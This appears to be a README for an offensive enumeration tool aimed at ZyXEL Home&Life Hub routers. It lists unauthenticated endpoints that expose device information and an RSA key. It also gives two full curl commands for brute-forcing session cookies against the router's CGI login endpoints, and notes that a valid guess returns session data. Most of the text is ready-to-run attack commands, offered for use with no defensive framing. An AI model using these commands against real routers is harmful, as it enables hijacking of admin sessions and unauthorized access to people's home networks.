Home-Life-Hub-enumeration

Enumeration of Home&Life Hub routers from ZyXEL Communications Corp.

[BASIC ENUMERATION] Script Usage - less informations

python3 HomeLifeHub.py (router's ip)

[IMPORTANT] Manual Enumeration - more informations

Basic information -> http://{target}/getBasicInformation
RSA public key -> http://{target}/getRSAPublickKey
Get a preview of the admin panel -> http://{target}/static/lang/

[SESSION BRUTEFORCE] Check if a session cookie is valid

curl -i -s -k -X $'GET' \
    -H $'Host: TARGET_IP' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36' -H $'X-Requested-With: XMLHttpRequest' -H $'Referer: http://TARGET_IP/login' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
    -b $'Session=PROBABLY_9_DIGITS' \
    $'http://TARGET_IP/cgi-bin/DAL?oid=login_privilege'

This will return 401 or 200 + session data depending if the session cookie is valid.

Alternative:

curl -i -s -k -X $'GET' \
    -H $'Host: TARGET_IP' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36' -H $'X-Requested-With: XMLHttpRequest' -H $'Referer: http://TARGET_IP/login' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
    -b $'Session=PROBABLY_9_DIGITS' \
    $'http://TARGET_IP/cgi-bin/UserLoginCheck'

This will return 401 or 200 depending if the session cookie is valid.